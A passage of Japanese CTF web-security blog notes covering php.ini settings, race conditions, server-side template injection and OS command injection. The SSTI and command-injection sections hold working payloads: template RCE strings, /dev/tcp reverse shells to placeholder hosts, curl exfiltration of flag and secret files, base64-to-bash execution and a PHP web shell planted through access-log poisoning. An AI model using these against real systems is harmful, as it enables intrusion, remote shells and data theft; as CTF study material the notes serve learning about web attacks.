- allow_url_fopen: 有効ならLFIできる？（よくわかってない）
  - urlで外部ファイルをfopenできるってだけ？
  - REMOTE FILE INCLUSIONというらしい
- asp_tags: aspタグを解析するために有効になっている
- magic_quotes_gpc: adslashes() のような文字をエスケープ
- libxml 2.9 より前のバージョンでは、外部エンティティへの参照をデフォルトでサポートしていたため、XXEできる
- opcacheはPHPコードをコンパイルしてキャッシュしておくもの
  - 有効でファイルアップロードできれば、キャッシュポイズニングができるかも
  - サーバーファイルと同じ名前のローカルファイルを生成し、キャッシュファイル xx.php.binを生成すればいい
  - GoSecure/php7-opcache-override: Security-related PHP7 OPcache abuse tools and demo
    - 有用なレポジトリ
- imapが有効なら、CVE-2018-19518かも
- upload_tmp_dir: 一時ファイルが保存されているフォルダが表示されますが、ファイル名はランダム
参考
php.iniのスキャナー
- GitHub - psecio/iniscan: A php.ini scanner for best security practices

PHP難読化

YAK Pro

<?php
goto IF8nM; xf_W1: FNJF5: goto C3HKQ; FwMGj: echo $GPDVR; goto Caizj; rOdKz: r9mi3: goto EDaji;

こんな感じになる。根性で解読する。

2021-12-16

CTFのWebセキュリティにおけるRace Condition

Security

この記事はCTFのWebセキュリティ Advent Calendar 2021の16日目の記事です。

レースコンディション Race Condition

Race Condition
- 競合状態。攻撃対象に対して同時に操作を行ったときに、意図しない動作になることを利用する
- CWE-362
- 参考
- MSDNにガイドラインがあった
- OWASP_NZDay_2011_BrettMoore_ConcurrencyVulnerabilities.pdf

どういう問題を発生させられるか

例えば、クーポンを使用する処理があって以下のようなフローになっているとする。

クーポンがあるか確認
クーポンを使用して、クーポンを消す

2つのプロセスで同一クーポンに対してリクエストをほぼ同時に投げたとする。
プロセスAとプロセスBにおいて、「A1 → B1 → A2 → B2」のような順番で処理が行われてしまうと、
クーポンは1つなんだけれど、クーポン使用が2回行われてしまう可能性がある。
このように、排他処理を適切に行わないことで、競合状態を発生させて、攻撃を行う。

他問題
- Race conditions
  - TOCTOU
  - コンテキスト外でオブジェクトが再利用される
  - 処理フロー内でオブジェクトが編集される
- Deadlocks
  - 2箇所からアップデートされる
  - ロック、データベースのトランザクションの不整合

体系的にはどんな問題に適用される？

整合性チェックと実際の処理に時間差がある場合
整合性チェックを行う場合に一般的に紛れ込むのかもしれない
他にもロジックミスとしてrace conditionが絡んでいる場合もあり、一概に言えない

攻撃シナリオ

ファイルをアップロードして何かを行うサービス
- サーバ側処理
  - 1. ファイルをtmpフォルダにアップロード
  - 1. アップロードファイルに対してサーバ側が処理を行う
  - 1. アップロードしたファイルを削除する
- 攻撃
  - 1でファイルをアップロードするときにphpファイルをアップロードしておく。その直後、3で削除される前に参照して、任意コード実行を達成する
購入サイト
- サーバ側処理「お金があるか確認→購入処理→お金を減らす」
- 同時に購入することでお金の消費は1回で複数個数買える場合がある
  - これはお金を減らす処理が「最初にお金があるか確認したものから金額を減らして更新する」場合に特に有効
送金システム
- サーバ側処理「送金→記録」
- これも同時に行えば、お金の減りは1回だけど複数回送れたりする

tips

TOCTOU
- Time of check to time of use
- チェックしてから使用するまでに変更があるときに発生するバグの総称
- 上で紹介してるのもこれ
- 大抵の解説記事に存在するファイル名重複チェック時のTOCTOU競合脆弱性 - YouTube 徳丸動画を見ればいい

2021-12-15

CTFのWebセキュリティにおけるSSTIまとめ

Security

この記事はCTFのWebセキュリティ Advent Calendar 2021の15日目の記事です。

Template Injection

テンプレートエンジン: データの表示場所を埋め込んだhtmlなどのテンプレートに対して、適切に変数の中身を埋め込んで出力するエンジン
- この機能を悪用し、悪意ある文字列を入力することで、意図しない変数の中身を表示したり、RCEを起こしたりする脆弱性。
- クライアント側かサーバ側かで2通りある。
- SSTI: Server-Side Template Injection, Server-Sideでテンプレートエンジンを動かして色々やる
- CSTI: Client-Side Template Injection, Client-Sideでテンプレートエンジンを動かして色々やる

Server-Side Template Injection

Server-Side Template Injection

まずはこれを試そう

GitHub - DiogoMRSilva/websitesVulnerableToSSTI: Simple websites vulnerable to Server Side Template Injections(SSTI)
- ここにリスト化されているけどめんどい…
{{2*2}} Flask/Jinja2
{{7*7}}[[5*5]]

Python

ninja (flaskのrender_template_stringは内部でninja使ってる)
- {{config}}
- RCE {{request.application.__globals__.__builtins__.__import__('os').popen('ls -lah').read()}}
- RCE2 {{request['application']['__globals__']['__builtins__']['__import__']('os')['popen']('ls')['read']()}}
- リバースシェル {{().__class__.__bases__[0].__subclasses__()[405](['bash -c %22bash -i %3E& /dev/tcp/yourserverip/yourport 0%3E&1%22'], shell=True)}}
- RCE {{request[request.cookies['a']][request.cookies['b']][request.cookies['c']][request.cookies['d']][request.cookies['e']][request.cookies['f']]('subprocess')[request.cookies['g']](request.cookies['h'],shell=True)}}として"a": "__class__","b": "_get_file_stream","c": "im_func","d": "func_globals","e": "__builtins__","f": "__import__","g": "check_output","h": cmdという感じ
- ninjaで使える難読化
  - Jinja2 SSTI filter bypasses. as you (should) know — blacklists are… | by IndominusByte | Medium
    - DMM [ 487 points ]
    - ここにも色々ペイロードがある
- BtS-CTF-Challenges-03-2021/README.md at master · PWrWhiteHats/BtS-CTF-Challenges-03-2021 · GitHub
  - {{request.__class__.__mro__}}で色々出てくる最後にobjectがあるから、それを選択して、{{request.__class__.__mro__[11].__subclasses__()}}とするとグローバル空間にあるものが色々でてくるから、{{request.__class__.__mro__[11].__subclasses__()[495].__dict__}}とすると、メソッド一覧を出せるから、{{request.__class__.__mro__[11].__subclasses__()[495].get_flag()}}みたいにして出す
- CTF的 Flaskに対する攻撃まとめ - Qiita
- Blog - Build yourself in
- 複数個所置けるところがあるが、それぞれ文字数制限がある場合
  - CTFtime.org / Digital Overdose 2021 Autumn CTF / madlib
    - %setを使うことで変数に代入して分割する
    - なんとconfig.update（key = _value）とやることで、configに任意の値を永続化させておくことができる。
      - config.update(a=config.__class__)とやれば、そのあと違うリクエストでもconfig.aはconfig.__class__と同じになる（！）
bottle
- SimpleTemplate Engine — Bottle 0.13-dev documentation
- {{ __builtins__.get("__import__")("os").popen('ls -al /').read() }}
- %で任意pythonコードが書ける
- 参考
  - ctf-writeups/InterKosenCTF-2020/miniblog at master · aplhk/ctf-writeups
  - InterKosenCTF 2020 WriteUp - Ryoto's Blog
Tornade
- Server Side Template Injection in Tornado
- RCEコード {% import os %}{{ os.popen("whoami").read() }}
- {{globals()}}これでも情報が抜けるみたい
  - 'application': <tornado.web.Application object at 0x7fdbb22e4750>みたいなtornadeのインスタンスがあれば{{application.settings["cookie_secret"]}}で秘密鍵が抜ける
  - {{dir(application)}}とすると、applicationのメソッド・プロパティが抜ける
  - {{application.settings}}で秘密鍵が手に入る
- 問題
  - CTFtime.org / csictf 2020 / The Usual Suspects

Java

Thymeleaf
- <td th:utext="${fish.name}">という感じの記法
- return "[input]";みたいになってたらredirect:/customer/listみたいにすればリダイレクトさせられる
- org.thymeleaf.exceptions.TemplateInputException
- Exploiting SSTI in Thymeleaf | Acunetix
- Spring View Manipulation Vulnerability | Veracode
- SSTI (Server Side Template Injection) - HackTricks
- RCE
  - __${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("<cmd-here>").getInputStream()).next()}__::.x
  - ${T(java.lang.Runtime).getRuntime().exec('<cmd-here>')}
- Reverse Shell
  - __${new java.util.Scanner(T(java.lang.Runtime).getRuntime().exec("/bin/sh -i >& /dev/tcp/myip/1337 0>&1").getInputStream()).next()}__::.x

javascript, node.js

Handlebars
- {{変数名}}で変数の中身を出せる
- グローバル変数の中身全部出る {{#each this}}{{@key}} => {{this.toString}}<br>{{/each}}
- 参考になる → Built-in Helpers | Handlebars
- registerPartialで指定されているレジスタを出力したいとき
  - hbs.registerPartial('FLAG', FLAG);とあれば、{{> FLAG}}
- Defenit CTF 2020 の write-up - st98 の日記帳
  - FLAGという言葉はつかえないけど、FLAGを得たいとき
  - {{.}}で与えられている変数すべてをオブジェクトとして参照できる
  - {{#each .}}{{@key}}<br>{{/each}}のように#each というヘルパーを使えばオブジェクトに対して反復的に処理ができ、#each によって囲まれているブロックで @key という変数を使えば現在参照されているキーが得られる
  - {{#each .}}{{@key}}<br>{{/each}}で変数すべての名前が得られる
  - {{#each .}}{{#if (lookup . "toString")}}{{.}}<br>{{/if}}{{/each}}でその中でtoStringを持つものだけ出力する
ejs
- RCE <%- global.process.mainModule.require('child_process').execSync('cat app.js') %>
- LFI <%- include('../../../app.js') %>
- <%= 7*7 %>
dust.js
- Artsploit: [demo.paypal.com] Node.js code injection (RCE)
  - DarkCTF Writeup - こんとろーるしーこんとろーるぶい
  - dust-helper.jsのifヘルパーに脆弱性がある
  - 指定する変数が配列ならサニタイズはされず、msg[]='-require('child_process').exec('curl [URL]')-'とすると上手くいくか確認できる。

Go

templates
- template - The Go Programming Language
- {{goWAF}}こういう感じの構文
- goWAF
  - {{print "Test"}}とやると、Testが出力される。これは単にprint("Test")を呼んでいる感じ。こういう感じに関数呼び出しができる
  - 入れ子構造にしたいときは{{f(g "arg")}}みたいにすると、f(g("arg"))という呼び出しになる
- Go SSTI Method Confusion
  - {{.System "id"}}でRCE達成
  - {{}.File "/etc/passwd"}でLFI達成
  - {{.}}で与えられてる変数が全部見れる
- CTFtime.org / H@cktivityCon 2021 CTF / Go Blog
  - 全ページに表示される自分の名前部分にSSTIの脆弱性がある
  - 投稿サイトなのだが、投稿されたポストを見ると{{.Post.Author.Username}}のような感じでポスト者の情報がテンプレートに与えられている
  - なので、adminが投稿したポストを全ページにあるSSTIを利用して{{.}}とやるとadmin（投稿者）にまつわる色々情報が見えてしまう
  - この情報からadminのメールアドレスを抜き出す
  - .Post.AuthorはUser構造体になっていて、関数としてChangePasswordを持っている
  - SSTIでメソッドを呼び出すこともできるので、{{.Post.Author.ChangePassword "NewPassword"}}とすればパスワード変更ができ、TakeOver

Client-Side Template Injection

できてXSSな気がするが…
以下のようなエンジンが狙われる
- AngularJS
  - dangerouslySetInnerHTMLが肝らしいがよくわかってない
- ReactJS

2021-12-14

CTFのWebセキュリティにおけるCommand Injectionまとめ（Linux, Windows, RCE）

Security

この記事はCTFのWebセキュリティ Advent Calendar 2021の14日目の記事です。

RCE/コマンドインジェクション

RCE: Remote Code Execution
- 遠隔で意図しないコードを走らせることでシステムを侵害するもの
- コマンドインジェクションは、コマンドインジェクションができるとRCEできてしまうみたいな繋がり
RCEの契機
- コマンドインジェクション
- ファイルをアップロードして実行できてしまう
  - ångstromCTF 2020 Writeups | Joseph Surin | Joseph Surin Personal Blog
  - 色々かいくぐると実行できたりする
- 安全でないデシリアライゼーション
- etc...

実行時に使えるコマンドについて

Linux

よく使う
- id 実行ユーザーなどの実行情報が得られる。これをコマンドインジェクションのテストに利用しているのをよく見かける
- env > dump.txt 環境変数持ってくる。Dockerで作られている場合は環境変数にデータが入ってる時がよくある
- cat [file] fileの中身を画面出力する
  - cat * フォルダのファイルをすべてcatしてくる
  - cat /opt/flag.txtの代わりecho `</opt/flag.txt`かecho $(</opt/flag.txt)
findテク
- find / -name "user.txt" 2>/dev/null user.txtというファイルを探してくる
- find . -type f -exec cat {} + フラグを検索してくるコマンド
- find / -iname "*flag*" flagという名前の入ったファイル名を探してくるコマンド
- find / -name user.txt 2>/dev/null user.txtというファイルのパスを探してくるが、エラーが沢山出るときは、/dev/nullに出力して消している
- find / -name mattermost 2>/dev/null mattermostの設定ファイルを探したいみたいなときはこういうのをやってみる
- find / -name "user.txt" -exec md5sum {} \; 2>/dev/null 検索結果すべてについてmd5ハッシュ取得したいとき
- find . -type f -exec tail -n+1 {} + 現在の階層以下のファイルをファイル名付きで中身を表示する
持ってきて外部送信する
- cat /flag | curl [url] -X POST -d @-
- cat /flag | base64 | curl [url] -X POST -d @-
- curl http://mydomain:8080/$(ls flag*)
ls
- ls -la 大体これでいい
- ls -alps 最終進化系
- echo opt/*とするとls opt/の代わりに使える
- head /*とするとls /の代わりに使えるし、中身も表示させる
- ls -R 再帰的にフォルダの中身を確認できる -Raとすれば隠しフォルダも入る
未分類
- | less -R 色付きでlessできる
- echo "[userpass]" | su [username] -c "[command]"
  - あるユーザー権限でコマンド実行したいとき
- grep flag $(find $PWD -maxdepth 1 -type f -name main.py) | tee '/uploads/flag.txt'
  - $PWDはカレントディレクトリを指し、カレントディレクトリを深さ1でmain.pyという名前のファイルを探してくれる
  - そこから更にgrepでflagが入っている行を探してくる
  - それをパイプでteeコマンドに送り、アップロードフォルダ（ユーザーが直接参照可能な任意のフォルダ）に吐き出している
- echo '{encoded}' | base64 -d | bash
  - base64化したコードが実行可能
- base64 req.php
- wget <webhook-url> これでRCE達成できてるかを確認できる
- su [username] ユーザー変更
- grepでBinary file (standard input) matchesと言われたときはgrepに-aオプションを使えばいい
- ホスト側でsudo tcpdump -i eth0 icmpとして攻撃側でping [myip]を試すとパケットが来るかで実行できたか判断がつく
- hostname -i 自身のIPアドレス取得
- cat all.txt | grep -v "^#" | wc -l 先頭が#の行を削除して行数数えてる
- grep -l phishing@email.com /home/ranger/Desktop/data/* phishing@email.comが含まれるファイルを探してくる
- $(env | grep FLAG)でうまくとってこれなかったら、$(env | grep FLAG | base64)で取ってこれたことがある
普通の操作
- grep [検索したい文字列] -rl [検索対象フォルダのパス] 検索パス配下に検索したい文字列が含まれるファイルをリスト化してくる
- grep -ir '.*' * 今のフォルダ以下の中身を全部持ってこれるコマンド

Windows

whoami ただ単に確認したいとき
ipconfig
tasklist
netstat -an
C:\Windows\System32\cmd.exe
- そのままコマンド使うとき C:\Windows\System32\cmd.exe /c [command]
C:\Windows\System32\hostname.exe
- ホスト名を返す
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

コマンドインジェクション

コマンドインジェクション
- OSコマンドインジェクションみたいにOSが付くときもある
- RCEの一種で、OSコマンドを呼び出している部分にインジェクションすることで、任意コードを実行する
- そんな状況あるか？という話だが、メール送信をコマンド頼りにしていたり、最近だとAIエンジンをpythonで作ってて、適当にコマンド呼び出しで実行してたりすると、ありそうかなという感じ。
お手軽に差し込む場合は||command||とすればいい
- 差し込み後にA||command||Bとなった場合、Aが不完全なら異常終了となり、commandが実行される
- commandが正常終了されるような感じになっていればBは実行されずに終わる
- ; sleep 10;とか||sleep 10||が最初は良さそう（レスポンスがなくてもわかるし）
パイプ文字について
- A | B Aの標準出力をBの標準入力につなげるやつ
- A && B Aを実行して正常終了したら、B実行
- A & B AとBを並列実行
- A || B Aを実行して異常終了したら、B実行
- A; B Aを実行して、Bを実行
ペイロード
- What is Command Injection - CTF 101
  - ;ls $(ls) ls
- w181496/Web-CTF-Cheatsheet: Web CTF CheatSheet 🐈
  - ?とか*とか使った例のテク /???/??t /???/p??s??
`で囲むと実行できたりする
改行することで複文実行できる可能性がある \ncat flag.txtみたいな感じ

名前付きパイプ

mkfifoで作成できる
- lsをしたときに先頭がpとして出てくる
- 出力しようとすると入力されるまで待つし、逆に入力しようとすると出力されるまで待つ

テクまとめ

$(pwd | cut -c1)を使うと、/になる
- ctf/flag.txtと書きたいけど/がフィルターされてるならctf$(pwd | cut -c1)flag.txtと書ける
RCEできるけど文字列制限が厳しい場合
- 分割輸送テク
  - rm /tmp/[randomstring]
  - echo -n '[command]' >> /tmp/[randomstring]でコマンドを分割輸送
  - sh /tmp/[randomstring]
- wgetで輸送してくるテク
  - .sh .ch /tmpして.sh wget aaaa.ef/x
  - .sh chmod 777 /tmp/x
スペースが使えないとき
- {echo,hello,world}みたいに書くと、hello worldと出力される
- 例
  - {cd,..}&&{ls,-la}&&{cat,--,-FLAG-2-of-2-.txt}
  - ||{cd,..}||{cd,~}&&{ls,-la,icons}"
  - ||{cd,..}&&{ls,-la}&&{cat,index.cgi}
cd ..を使うことで../が禁止されててもなんとかなる
コマンドの頭に\(バックスラッシュ)をつけると、alias を無視してコマンドを入力できる。
- lsにエイリアスがついて意地悪されても\lsとすれば従来のlsが実行可能
tarコマンド
- UTCTF: Tar Inspector | Debugmen
- --to-commandというのがあり、tarファイルの中身のファイルを指してファイル実行ができる
  - evil.shというのを入れたtarファイルで--to-command=sh evil.shとすれば実行可能
- 後ろでエラーが出てしまうときは--mtime=に全部押し込むとエラーを消せる
curlコマンド
- Cyber Apocalypse CTF 2021 Writeup | y011d4.log
  - curl [url] -F query="flag=@[path]"とすることでpathにあるファイルの中身をqueryとしてurlに送信してくれる
    - 例 MY_URL -F "flag=@/flag
- Web: Reveal Me (Wormcon 0x01). Description: Everything is in front of… | by x3rz | vulnfreak | Aug, 2021 | Medium
  - curl -l -d @/etc/flag.txt http://uniqueid.ngrok.ioでもフラグが遅れる
- HackTheBox - Haircut | p0i5on8
  - curl [url] -o [path]で任意ファイルアップロードできる
検索の後にpipeを差し込むことで実現できたりする。blind command injection
- Blind Command Injection - It hurts | by Jerry Shah (Jerry) | Medium
base64を使って文字種制限をバイパスする HactivityCon 2021 CTF Web challenge writeup - きなこもち。
1. echo "base64-decoded payload" > /tmp/payload.txtでペイロードを送り込む
2. echo "import base64" > /tmp/shell.pyとecho "exec(base64.b64decode(open('/tmp/payload.txt').read()).decode('utf8'))" >> /tmp/shell.pyで実行コード作成
3. python3 /tmp/shell.pyで発動
Blind Command Injection
- 外部の通信ができないが、エラー発生などからサイドチャネル的に情報を抜き出してくる
- st98 の日記帳 - コピーのMicroservices As A Service 1
- (ord(open('/flag.txt','r').read()[{i}]) %26 (1 << {j})) or 'a'という感じでビット演算を利用して1ビットずつ特定していく

言語/フレームワーク

OS コマンドインジェクションその危険性と対策 | yamory Blog
- 実行コマンド一覧がある

PHP

任意コマンド実行方法が沢山ある
- PHPはコマンド実行関数多すぎだろ - ぱせらんメモ
- PHP: 実行演算子 - Manual
  - 実行演算子なるものもある (back quoteのアレ)
  - ブラックリスト法では見逃しがちかな？（ブラックリスト法がそもそも悪だけど）
- シェルを経由しないOSコマンド呼び出しがPHP7.4で実装された | 徳丸浩の日記
  - ついに安全なコマンド呼び出し方法が得られた？
escapeshellcmd関数
- PHP: escapeshellcmd - Manual
- PHPのescapeshellcmdの危険性 | 徳丸浩の日記
  - ' および " は、対になっていない場合にのみエスケープされますとあるので、対にすればエスケープされず、バイパス可能
  - phpのescapeshellcmdの余計なお世話を無くすパッチ – yohgaki's blog
    - windowsの場合はエスケープしてくれるっぽい
escapeshellarg, escapeshellcmd関数は危険
- exploits/exploit-bypass-php-escapeshellarg-escapeshellcmd.md at master · kacperszurek/exploits
- Security Advisory: PHP's escapeshellcmd and escapeshellarg are insecure
- escapeshellargの方がマシっぽい
アクセスログとLFIを使ってRCE達成するやり方
- これで<?php system(\$_GET['cmd']); ?>をUser-Agentに含めてどこかにアクセスする
- アクセスログにはUser-Agentがそのまま載るので、それをLFIで取ってくる。
- 具体的には/var/log/apache2/access.logをLFIさせるようにして、cmdをGETリクエストとして入れればRCE達成

Ruby

任意コマンド実行方法
- Rubyで外部コマンドを実行して結果を受け取る方法あれこれ - Qiita